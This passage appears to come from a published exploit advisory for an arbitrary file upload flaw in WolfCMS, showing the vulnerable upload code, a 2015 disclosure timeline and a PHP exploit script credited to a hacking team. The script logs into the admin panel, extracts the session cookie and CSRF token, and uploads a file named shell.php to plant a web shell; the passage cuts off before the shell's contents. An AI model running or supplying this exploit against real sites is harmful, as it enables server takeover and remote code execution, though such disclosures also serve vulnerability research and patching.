_upload_file($filename, FILES_DIR . '/' . $path . '/', $_FILES['upload_file']['tmp_name'], $overwrite); if ($file === false) Flash::set('error', __('File has not been uploaded!')); } ----------------------------------------------------------------------------- ##################### Disclosure Timeline ##################### [04/04/2015] - Issue reported to Developer Team [08/04/2015] - Discussed for fixing the issue [16/04/2015] - Issue reported to http://seclists.org/oss-sec/2015/q2/210 [22/04/2015] - Public disclosure ##################################################### EXPLOIT ##################################################### */ error_reporting(0); set_time_limit(0); ini_set("default_socket_timeout", 50); function http_send($host, $packet) { if (!($sock = fsockopen($host, 80))) die("\n[-] No response from {$host}:80\n"); fputs($sock, $packet); return stream_get_contents($sock); } print "\n+---------------------------------------+"; print "\n| WolfCMS Arbitrary File Upload Exploit |"; print "\n+---------------------------------------+\n"; if ($argc < 5) { print "\nUsage......: php $argv[0] \n"; print "\nExample....: php $argv[0] localhost /wolfcms test password\n"; die(); } $host = $argv[1]; $path = $argv[2]; $user = $argv[3]; $pass = $argv[4]; print "\n ,--^----------,--------,-----,-------^--, \n"; print " | ||||||||| `--------' | O \n"; print " `+---------------------------^----------| \n"; print " `\_,-------, _________________________| \n"; print " / XXXXXX /`| / \n"; print " / XXXXXX / `\ / \n"; print " / XXXXXX /\______( \n"; print " / XXXXXX / \n"; print " / XXXXXX / .. CWH Underground Hacking Team .. \n"; print " (________( \n"; print " `------' \n"; $login = "login[username]={$user}&login[password]={$pass}&login[redirect]=/wolfcms/?/admin/"; $packet = "POST {$path}/?/admin/login/login HTTP/1.1\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Cookie: PHPSESSID=cwh\r\n"; $packet .= "Content-Length: ".strlen($login)."\r\n"; $packet .= "Content-Type: application/x-www-form-urlencoded\r\n"; $packet .= "Connection: close\r\n\r\n{$login}"; $response = http_send($host, $packet); if (!preg_match_all("/Set-Cookie: ([^;]*);/i", $response, $sid)) die("\n[-] Session ID not found!\n"); $packet = "GET {$path}/?/admin/plugin/file_manager HTTP/1.1\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Cookie: {$sid[1][2]}\r\n"; $packet .= "Connection: close\r\n\r\n"; $response=http_send($host, $packet); if (!preg_match_all("/csrf_token\" type=\"hidden\" value=\"(.*?)\" \/>/i", $response, $token)) die("\n[-] The username/password is incorrect!\n"); print "\n[+] Login Successfully !!\n"; sleep(2); print "\n[+] Retrieving The Upload token !!\n"; print "[+] The token is: {$token[1][4]}\n"; $payload = "--o0oOo0o\r\n"; $payload .= "Content-Disposition: form-data; name=\"csrf_token\"\r\n\r\n"; $payload .= "{$token[1][4]}\r\n"; $payload .= "--o0oOo0o\r\n"; $payload .= "Content-Disposition: form-data; name=\"upload_file\"; filename=\"shell.php\"\r\n"; $payload .= "Content-Type: application/octet-stream\r\n\r\n"; $payload .= "